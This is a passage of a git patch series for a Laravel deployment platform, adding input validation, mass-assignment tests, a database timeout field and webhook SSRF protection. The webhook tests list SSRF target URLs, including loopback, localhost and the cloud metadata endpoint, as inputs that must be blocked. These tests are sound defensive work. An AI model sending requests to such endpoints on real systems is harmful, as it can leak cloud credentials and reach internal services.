+        expect($model->isFillable('postgres_user'))->toBeTrue();
+        expect($model->isFillable('postgres_password'))->toBeTrue();
+        expect($model->isFillable('image'))->toBeTrue();
+        expect($model->isFillable('limits_memory'))->toBeTrue();
+
+        $model = new StandaloneRedis;
+        expect($model->isFillable('redis_password'))->toBeTrue();
+
+        $model = new StandaloneMysql;
+        expect($model->isFillable('mysql_root_password'))->toBeTrue();
+
+        $model = new StandaloneMongodb;
+        expect($model->isFillable('mongo_initdb_root_username'))->toBeTrue();
+    });
+
+    test('Application fill ignores non-fillable fields', function () {
+        $application = new Application;
+        $application->fill([
+            'name' => 'test-app',
+            'environment_id' => 999,
+            'destination_id' => 999,
+            'team_id' => 999,
+            'private_key_id' => 999,
+        ]);
+
+        expect($application->name)->toBe('test-app');
+        expect($application->environment_id)->toBeNull();
+        expect($application->destination_id)->toBeNull();
+        expect($application->private_key_id)->toBeNull();
+    });
+
+    test('Service model blocks mass assignment of relationship IDs', function () {
+        $service = new Service;
+
+        expect($service->isFillable('id'))->toBeFalse();
+        expect($service->isFillable('uuid'))->toBeFalse();
+        expect($service->isFillable('environment_id'))->toBeFalse();
+        expect($service->isFillable('destination_id'))->toBeFalse();
+        expect($service->isFillable('server_id'))->toBeFalse();
+    });
+});

From 0b8c75f8edb12bc9084c1b6cd844643d7ae95701 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 14:23:08 +0100
Subject: [PATCH 169/213] fix(webhooks): add validation to block unsafe webhook
 URLs

Prevent server-side request forgery (SSRF) attacks by validating webhook URLs before sending requests. Blocks loopback addresses, cloud metadata endpoints, and localhost URLs.

- Add SafeWebhookUrl rule validation in SendWebhookJob.handle()
- Log warning when unsafe URLs are rejected
- Add comprehensive unit tests covering valid and invalid URL scenarios
---
 app/Jobs/SendWebhookJob.php       | 16 +++++++
 tests/Unit/SendWebhookJobTest.php | 77 +++++++++++++++++++++++++++++++
 2 files changed, 93 insertions(+)
 create mode 100644 tests/Unit/SendWebhookJobTest.php

diff --git a/app/Jobs/SendWebhookJob.php b/app/Jobs/SendWebhookJob.php
index 607fda3fe..9d2a94606 100644
--- a/app/Jobs/SendWebhookJob.php
+++ b/app/Jobs/SendWebhookJob.php
@@ -9,6 +9,8 @@
 use Illuminate\Queue\InteractsWithQueue;
 use Illuminate\Queue\SerializesModels;
 use Illuminate\Support\Facades\Http;
+use Illuminate\Support\Facades\Log;
+use Illuminate\Support\Facades\Validator;
 
 class SendWebhookJob implements ShouldBeEncrypted, ShouldQueue
 {
@@ -40,6 +42,20 @@ public function __construct(
      */
     public function handle(): void
     {
+        $validator = Validator::make(
+            ['webhook_url' => $this->webhookUrl],
+            ['webhook_url' => ['required', 'url', new \App\Rules\SafeWebhookUrl]]
+        );
+
+        if ($validator->fails()) {
+            Log::warning('SendWebhookJob: blocked unsafe webhook URL', [
+                'url' => $this->webhookUrl,
+                'errors' => $validator->errors()->all(),
+            ]);
+
+            return;
+        }
+
         if (isDev()) {
             ray('Sending webhook notification', [
                 'url' => $this->webhookUrl,
diff --git a/tests/Unit/SendWebhookJobTest.php b/tests/Unit/SendWebhookJobTest.php
new file mode 100644
index 000000000..688cd3bf2
--- /dev/null
+++ b/tests/Unit/SendWebhookJobTest.php
@@ -0,0 +1,77 @@
+<?php
+
+use App\Jobs\SendWebhookJob;
+use Illuminate\Support\Facades\Http;
+use Illuminate\Support\Facades\Log;
+use Tests\TestCase;
+
+uses(TestCase::class);
+
+it('sends webhook to valid URLs', function () {
+    Http::fake(['*' => Http::response('ok', 200)]);
+
+    $job = new SendWebhookJob(
+        payload: ['event' => 'test'],
+        webhookUrl: 'https://example.com/webhook'
+    );
+
+    $job->handle();
+
+    Http::assertSent(function ($request) {
+        return $request->url() === 'https://example.com/webhook';
+    });
+});
+
+it('blocks webhook to loopback address', function () {
+    Http::fake();
+    Log::shouldReceive('warning')
+        ->once()
+        ->withArgs(function ($message) {
+            return str_contains($message, 'blocked unsafe webhook URL');
+        });
+
+    $job = new SendWebhookJob(
+        payload: ['event' => 'test'],
+        webhookUrl: 'http://127.0.0.1/admin'
+    );
+
+    $job->handle();
+
+    Http::assertNothingSent();
+});
+
+it('blocks webhook to cloud metadata endpoint', function () {
+    Http::fake();
+    Log::shouldReceive('warning')
+        ->once()
+        ->withArgs(function ($message) {
+            return str_contains($message, 'blocked unsafe webhook URL');
+        });
+
+    $job = new SendWebhookJob(
+        payload: ['event' => 'test'],
+        webhookUrl: 'http://169.254.169.254/latest/meta-data/'
+    );
+
+    $job->handle();
+
+    Http::assertNothingSent();
+});
+
+it('blocks webhook to localhost', function () {
+    Http::fake();
+    Log::shouldReceive('warning')
+        ->once()
+        ->withArgs(function ($message) {
+            return str_contains($message, 'blocked unsafe webhook URL');
+        });
+
+    $job = new SendWebhookJob(
+        payload: ['event' => 'test'],
+        webhookUrl: 'http://localhost/internal-api'
+    );
+
+    $job->handle();
+
+    Http::assertNothingSent();
+});

From 4213bd5215ec56b385a079df71f4115f768fa5d0 Mon Sep 17 00:00:00 2001
From: Gauthier POGAM--LE MONTAGNER <gauthier.pogam-lemontagner@protonmail.com>
Date: Sat, 28 Mar 2026 16:14:05 +0100
Subject: [PATCH 170/213] fix(langfuse): pin clickhouse version to avoid error
 during clickhouse init

The releases published on 27/03/26 causes Clickhouse to incorrectly
initialize. This prevent the DB from restarting after the initial run.

This pin the version to the most recent version that was working
properly.
---
 templates/compose/langfuse.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/langfuse.yaml b/templates/compose/langfuse.yaml
index 2b877307f..b617cec5c 100644
--- a/templates/compose/langfuse.yaml
+++ b/templates/compose/langfuse.yaml
@@ -119,7 +119,7 @@ services:
       retries: 10
 
   clickhouse:
-    image: clickhouse/clickhouse-server:latest
+    image: clickhouse/clickhouse-server:26.2.4.23
     user: "101:101"
     environment:
       - CLICKHOUSE_DB=${CLICKHOUSE_DB:-default}

From 6197558a38f5afbb74f138be59b52e705c99bf1e Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 21:08:48 +0530
Subject: [PATCH 171/213] fix(validation): add input validation for resource
 limit fields

---
 .../Project/Shared/ResourceLimits.php         | 44 ++++++++++++++-----
 1 file changed, 32 insertions(+), 12 deletions(-)

diff --git a/app/Livewire/Project/Shared/ResourceLimits.php b/app/Livewire/Project/Shared/ResourceLimits.php
index 0b3840289..8a14dc10c 100644
--- a/app/Livewire/Project/Shared/ResourceLimits.php
+++ b/app/Livewire/Project/Shared/ResourceLimits.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Project\Shared;
 
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Validation\ValidationException;
 use Livewire\Component;
 
 class ResourceLimits extends Component
@@ -16,24 +17,24 @@ class ResourceLimits extends Component
 
     public ?string $limitsCpuset = null;
 
-    public ?int $limitsCpuShares = null;
+    public mixed $limitsCpuShares = null;
 
     public string $limitsMemory;
 
     public string $limitsMemorySwap;
 
-    public int $limitsMemorySwappiness;
+    public mixed $limitsMemorySwappiness = 0;
 
     public string $limitsMemoryReservation;
 
     protected $rules = [
-        'limitsMemory' => 'required|string',
-        'limitsMemorySwap' => 'required|string',
+        'limitsMemory' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
+        'limitsMemorySwap' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
         'limitsMemorySwappiness' => 'required|integer|min:0|max:100',
-        'limitsMemoryReservation' => 'required|string',
-        'limitsCpus' => 'nullable',
-        'limitsCpuset' => 'nullable',
-        'limitsCpuShares' => 'nullable',
+        'limitsMemoryReservation' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
+        'limitsCpus' => ['nullable', 'regex:/^\d*\.?\d+$/'],
+        'limitsCpuset' => ['nullable', 'regex:/^\d+([,-]\d+)*$/'],
+        'limitsCpuShares' => 'nullable|integer|min:0',
     ];
 
     protected $validationAttributes = [
@@ -46,6 +47,19 @@ class ResourceLimits extends Component
         'limitsCpuShares' => 'cpu shares',
     ];
 
+    protected $messages = [
+        'limitsMemory.regex' => 'Maximum Memory Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+        'limitsMemorySwap.regex' => 'Maximum Swap Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+        'limitsMemoryReservation.regex' => 'Soft Memory Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+        'limitsCpus.regex' => 'Number of CPUs must be a number (integer or decimal). Example: 0.5, 2.',
+        'limitsCpuset.regex' => 'CPU sets must be a comma-separated list of CPU numbers or ranges. Example: 0-2 or 0,1,3.',
+        'limitsMemorySwappiness.integer' => 'Swappiness must be a whole number between 0 and 100.',
+        'limitsMemorySwappiness.min' => 'Swappiness must be between 0 and 100.',
+        'limitsMemorySwappiness.max' => 'Swappiness must be between 0 and 100.',
+        'limitsCpuShares.integer' => 'CPU Weight must be a whole number.',
+        'limitsCpuShares.min' => 'CPU Weight must be a positive number.',
+    ];
+
     /**
      * Sync data between component properties and model
      *
@@ -57,10 +71,10 @@ private function syncData(bool $toModel = false): void
             // Sync TO model (before save)
             $this->resource->limits_cpus = $this->limitsCpus;
             $this->resource->limits_cpuset = $this->limitsCpuset;
-            $this->resource->limits_cpu_shares = $this->limitsCpuShares;
+            $this->resource->limits_cpu_shares = (int) $this->limitsCpuShares;
             $this->resource->limits_memory = $this->limitsMemory;
             $this->resource->limits_memory_swap = $this->limitsMemorySwap;
-            $this->resource->limits_memory_swappiness = $this->limitsMemorySwappiness;
+            $this->resource->limits_memory_swappiness = (int) $this->limitsMemorySwappiness;
             $this->resource->limits_memory_reservation = $this->limitsMemoryReservation;
         } else {
             // Sync FROM model (on load/refresh)
@@ -91,7 +105,7 @@ public function submit()
             if (! $this->limitsMemorySwap) {
                 $this->limitsMemorySwap = '0';
             }
-            if (is_null($this->limitsMemorySwappiness)) {
+            if ($this->limitsMemorySwappiness === '' || is_null($this->limitsMemorySwappiness)) {
                 $this->limitsMemorySwappiness = 60;
             }
             if (! $this->limitsMemoryReservation) {
@@ -103,7 +117,7 @@ public function submit()
             if ($this->limitsCpuset === '') {
                 $this->limitsCpuset = null;
             }
-            if (is_null($this->limitsCpuShares)) {
+            if ($this->limitsCpuShares === '' || is_null($this->limitsCpuShares)) {
                 $this->limitsCpuShares = 1024;
             }
 
@@ -112,6 +126,12 @@ public function submit()
             $this->syncData(true);
             $this->resource->save();
             $this->dispatch('success', 'Resource limits updated.');
+        } catch (ValidationException $e) {
+            foreach ($e->validator->errors()->all() as $message) {
+                $this->dispatch('error', $message);
+            }
+
+            return;
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }

From 72118d61f936bf475f8a71530aa70cf3083e50d9 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 17:08:02 +0100
Subject: [PATCH 172/213] feat(databases): add public port timeout
 configuration

Add support for configuring public port timeout on databases via API:
- Add public_port_timeout field to schema documentation with 3600s default
- Add validation rules (integer|nullable|min:1)
- Update all database type configurations to support the field
- Add comprehensive test coverage for the feature
---
 .../Controllers/Api/DatabasesController.php   |  47 +++---
 openapi.json                                  |  36 +++++
 openapi.yaml                                  |  27 ++++
 .../DatabasePublicPortTimeoutApiTest.php      | 147 ++++++++++++++++++
 4 files changed, 239 insertions(+), 18 deletions(-)
 create mode 100644 tests/Feature/DatabasePublicPortTimeoutApiTest.php

diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 660ed4529..33d875758 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -264,6 +264,7 @@ public function database_by_uuid(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -327,7 +328,7 @@ public function database_by_uuid(Request $request)
     )]
     public function update_by_uuid(Request $request)
     {
-        $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+        $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
             return invalidTokenResponse();
@@ -344,6 +345,7 @@ public function update_by_uuid(Request $request)
             'image' => 'string',
             'is_public' => 'boolean',
             'public_port' => 'numeric|nullable',
+            'public_port_timeout' => 'integer|nullable|min:1',
             'limits_memory' => 'string',
             'limits_memory_swap' => 'string',
             'limits_memory_swappiness' => 'numeric',
@@ -375,7 +377,7 @@ public function update_by_uuid(Request $request)
         }
         switch ($database->type()) {
             case 'standalone-postgresql':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
                 $validator = customApiValidator($request->all(), [
                     'postgres_user' => 'string',
                     'postgres_password' => 'string',
@@ -406,20 +408,20 @@ public function update_by_uuid(Request $request)
                 }
                 break;
             case 'standalone-clickhouse':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
                 $validator = customApiValidator($request->all(), [
                     'clickhouse_admin_user' => 'string',
                     'clickhouse_admin_password' => 'string',
                 ]);
                 break;
             case 'standalone-dragonfly':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
                 $validator = customApiValidator($request->all(), [
                     'dragonfly_password' => 'string',
                 ]);
                 break;
             case 'standalone-redis':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
                 $validator = customApiValidator($request->all(), [
                     'redis_password' => 'string',
                     'redis_conf' => 'string',
@@ -446,7 +448,7 @@ public function update_by_uuid(Request $request)
                 }
                 break;
             case 'standalone-keydb':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
                 $validator = customApiValidator($request->all(), [
                     'keydb_password' => 'string',
                     'keydb_conf' => 'string',
@@ -473,7 +475,7 @@ public function update_by_uuid(Request $request)
                 }
                 break;
             case 'standalone-mariadb':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
                 $validator = customApiValidator($request->all(), [
                     'mariadb_conf' => 'string',
                     'mariadb_root_password' => 'string',
@@ -503,7 +505,7 @@ public function update_by_uuid(Request $request)
                 }
                 break;
             case 'standalone-mongodb':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
                 $validator = customApiValidator($request->all(), [
                     'mongo_conf' => 'string',
                     'mongo_initdb_root_username' => 'string',
@@ -533,7 +535,7 @@ public function update_by_uuid(Request $request)
 
                 break;
             case 'standalone-mysql':
-                $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+                $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
                 $validator = customApiValidator($request->all(), [
                     'mysql_root_password' => 'string',
                     'mysql_password' => 'string',
@@ -1068,6 +1070,7 @@ public function update_backup(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1135,6 +1138,7 @@ public function create_database_postgresql(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1201,6 +1205,7 @@ public function create_database_clickhouse(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1268,6 +1273,7 @@ public function create_database_dragonfly(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1335,6 +1341,7 @@ public function create_database_redis(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1405,6 +1412,7 @@ public function create_database_keydb(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1475,6 +1483,7 @@ public function create_database_mariadb(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1542,6 +1551,7 @@ public function create_database_mysql(Request $request)
                         'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
                         'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
                         'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+                        'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
                         'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
                         'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
                         'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1580,7 +1590,7 @@ public function create_database_mongodb(Request $request)
 
     public function create_database(Request $request, NewDatabaseTypes $type)
     {
-        $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+        $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
 
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -1670,6 +1680,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
             'destination_uuid' => 'string',
             'is_public' => 'boolean',
             'public_port' => 'numeric|nullable',
+            'public_port_timeout' => 'integer|nullable|min:1',
             'limits_memory' => 'string',
             'limits_memory_swap' => 'string',
             'limits_memory_swappiness' => 'numeric',
@@ -1696,7 +1707,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
             }
         }
         if ($type === NewDatabaseTypes::POSTGRESQL) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
             $validator = customApiValidator($request->all(), [
                 'postgres_user' => 'string',
                 'postgres_password' => 'string',
@@ -1755,7 +1766,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::MARIADB) {
